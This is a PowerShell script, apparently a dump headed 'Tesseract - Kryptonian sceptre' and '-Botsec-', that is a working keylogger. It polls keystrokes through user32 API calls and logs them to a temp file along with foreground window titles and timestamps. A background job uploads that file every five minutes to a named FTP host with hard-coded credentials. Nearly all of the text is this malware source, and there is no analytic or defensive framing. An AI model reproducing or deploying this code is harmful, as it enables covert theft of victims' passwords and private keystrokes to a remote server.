<#Tesseract - Kryptonian sceptre|-Botsec-|#>function KeyLog { # MapVi

1. <#
2.  
3. Tesseract - Kryptonian sceptre
4. |-Botsec-|
5.  
6. #>
7. function KeyLog {
8.  
9. # MapVirtualKeyMapTypes
10. # <summary>
11. # uCode is a virtual-key code and is translated into a scan code.
12. # If it is a virtual-key code that does not distinguish between left- and
13. # right-hand keys, the left-hand scan code is returned.
14. # If there is no translation, the function returns 0.
15. # </summary>
16. $MAPVK_VK_TO_VSC = 0x00
17.  
18. # <summary>
19. # uCode is a scan code and is translated into a virtual-key code that
20. # does not distinguish between left- and right-hand keys. If there is no
21. # translation, the function returns 0.
22. # </summary>
23. $MAPVK_VSC_TO_VK = 0x01
24.  
25. # <summary>
26. # uCode is a virtual-key code and is translated into an unshifted
27. # character value in the low-order word of the return value. Dead keys (diacritics)
28. # are indicated by setting the top bit of the return value. If there is no
29. # translation, the function returns 0.
30. # </summary>
31. $MAPVK_VK_TO_CHAR = 0x02
32.  
33. # <summary>
34. # Windows NT/2000/XP: uCode is a scan code and is translated into a
35. # virtual-key code that distinguishes between left- and right-hand keys. If
36. # there is no translation, the function returns 0.
37. # </summary>
38. $MAPVK_VSC_TO_VK_EX = 0x03
39.  
40. # <summary>
41. # Not currently documented
42. # </summary>
43. $MAPVK_VK_TO_VSC_EX = 0x04
44.  
45. $virtualkc_sig = @'
46. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
47. public static extern short GetAsyncKeyState(int virtualKeyCode);
48. '@
49.  
50. $kbstate_sig = @'
51. [DllImport("user32.dll", CharSet=CharSet.Auto)]
52. public static extern int GetKeyboardState(byte[] keystate);
53. '@
54.  
55. $mapchar_sig = @'
56. [DllImport("user32.dll", CharSet=CharSet.Auto)]
57. public static extern int MapVirtualKey(uint uCode, int uMapType);
58. '@
59.  
60. $tounicode_sig = @'
61. [DllImport("user32.dll", CharSet=CharSet.Auto)]
62. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
63. '@
64.  
65. $foreground_sig = @'
66. [DllImport("user32.dll", CharSet=CharSet.Auto)]
67. public static extern IntPtr GetForegroundWindow();
68. '@
69.  
70. $getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
71. $getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
72. $getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
73. $getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
74. $getForeground = Add-Type -MemberDefinition $foreground_sig -name "Win32MyGetForeground" -namespace Win32Functions -passThru
75.  
76. while ($true) {
77. Start-Sleep -Milliseconds 40
78. $gotit = ""
79.  
80. for ($char = 1; $char -le 254; $char++) {
81. $vkey = $char
82. $gotit = $getKeyState::GetAsyncKeyState($vkey)
83.  
84. if ($gotit -eq -32767) {
85.  
86. $EnterKey = $getKeyState::GetAsyncKeyState(13)
87. $TabKey = $getKeyState::GetAsyncKeyState(9)
88. $DeleteKey = $getKeyState::GetAsyncKeyState(46)
89. $BackSpaceKey = $getKeyState::GetAsyncKeyState(8)
90. $LeftArrow = $getKeyState::GetAsyncKeyState(37)
91. $UpArrow = $getKeyState::GetAsyncKeyState(38)
92. $RightArrow = $getKeyState::GetAsyncKeyState(39)
93. $DownArrow = $getKeyState::GetAsyncKeyState(40)
94.  
95. $caps_lock = [console]::CapsLock
96.  
97. $scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
98.  
99. $kbstate = New-Object Byte[] 256
100. $checkkbstate = $getKBState::GetKeyboardState($kbstate)
101.  
102. $TopWindow = $getForeground::GetForegroundWindow()
103. $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
104.  
105. $LogOutput = "`"" + $WindowTitle + "`"`t`t`t"
106.  
107. $mychar = New-Object -TypeName "System.Text.StringBuilder";
108. $unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
109.  
110. $LogOutput += $mychar.ToString();
111.  
112. if ($EnterKey) {$LogOutput += '[ENTER]'}
113. if ($TabKey) {$LogOutput += '[Tab]'}
114. if ($DeleteKey) {$LogOutput += '[Delete]'}
115. if ($BackSpaceKey) {$LogOutput += '[Backspace]'}
116. if ($LeftArrow) {$LogOutput += '[Left Arrow]'}
117. if ($RightArrow) {$LogOutput += '[Right Arrow]'}
118. if ($UpArrow) {$LogOutput += '[Up Arrow]'}
119. if ($DownArrow) {$LogOutput += '[Down Arrow]'}
120.  
121. $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
122. $LogOutput += "`t`t`t`t`t" + $TimeStamp
123.  
124. if ($unicode_res -gt 0) {
125. $logfile = "$env:temp\key.log"
126. $LogOutput | Out-File -FilePath $logfile -Append
127. }
128. }
129. }
130. }
131. }
132.  
133. Start-Job {
134.  
135. # Config
136. $Username = "2452853_tesseract"
137. $Password = "aid3n4life"
138. $LocalFile = "$env:temp\key.log"
139. $RemoteFile = "ftp://tesseract.royalwebhosting.net/"
140. $SleepTime = 300
141.  
142. while (1 -eq 1)
143. {
144. # Sleep for specified time
145. Start-Sleep -Seconds $SleepTime
146.  
147. # Create FTP Rquest Object
148. $FTPRequest = [System.Net.FtpWebRequest]::Create("$RemoteFile")
149. $FTPRequest = [System.Net.FtpWebRequest]$FTPRequest
150. $FTPRequest.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile
151. $FTPRequest.Credentials = new-object System.Net.NetworkCredential($Username, $Password)
152. $FTPRequest.UseBinary = $true
153. $FTPRequest.UsePassive = $true
154.  
155. # Read the File for Upload
156. $FileContent = gc -en byte $LocalFile
157. $FTPRequest.ContentLength = $FileContent.Length
158.  
159. # Get Stream Request by bytes
160. $Run = $FTPRequest.GetRequestStream()
161. $Run.Write($FileContent, 0, $FileContent.Length)
162.  
163. # Cleanup
164. $Run.Close()
165. $Run.Dispose()
166. }
167. }
168.  
169. KeyLog